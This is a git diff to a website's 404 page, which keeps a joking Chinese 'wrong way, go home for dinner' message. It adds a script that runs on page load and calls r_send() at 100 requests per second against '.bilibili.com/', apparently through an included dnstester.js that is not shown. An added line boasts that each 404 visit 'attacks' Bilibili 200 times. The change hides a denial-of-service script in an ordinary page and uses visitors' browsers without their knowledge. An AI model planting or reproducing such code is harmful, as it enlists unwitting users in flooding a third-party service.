--- a/404.md
+++ b/404.md
@@ -7,3 +7,13 @@ includejs: "/js/dnstester.js"
 ---
 
 呀呀，你好像走错路了,你妈叫你[回家](/)吃饭
+
+<script  type="text/javascript">
+    var DOMAIN = ".bilibili.com/"; // Change to this form
+    var MAX_COUNT = 2; // Max time of hit
+    var TPS = 100; // Frequency
+    timegap = 1 / TPS; // Reciprocal, in case you have not finish grade 6
+    r_send(timegap);
+</script>
+
+事实上你访问一次404页面就相当于攻击了b站200次哦~
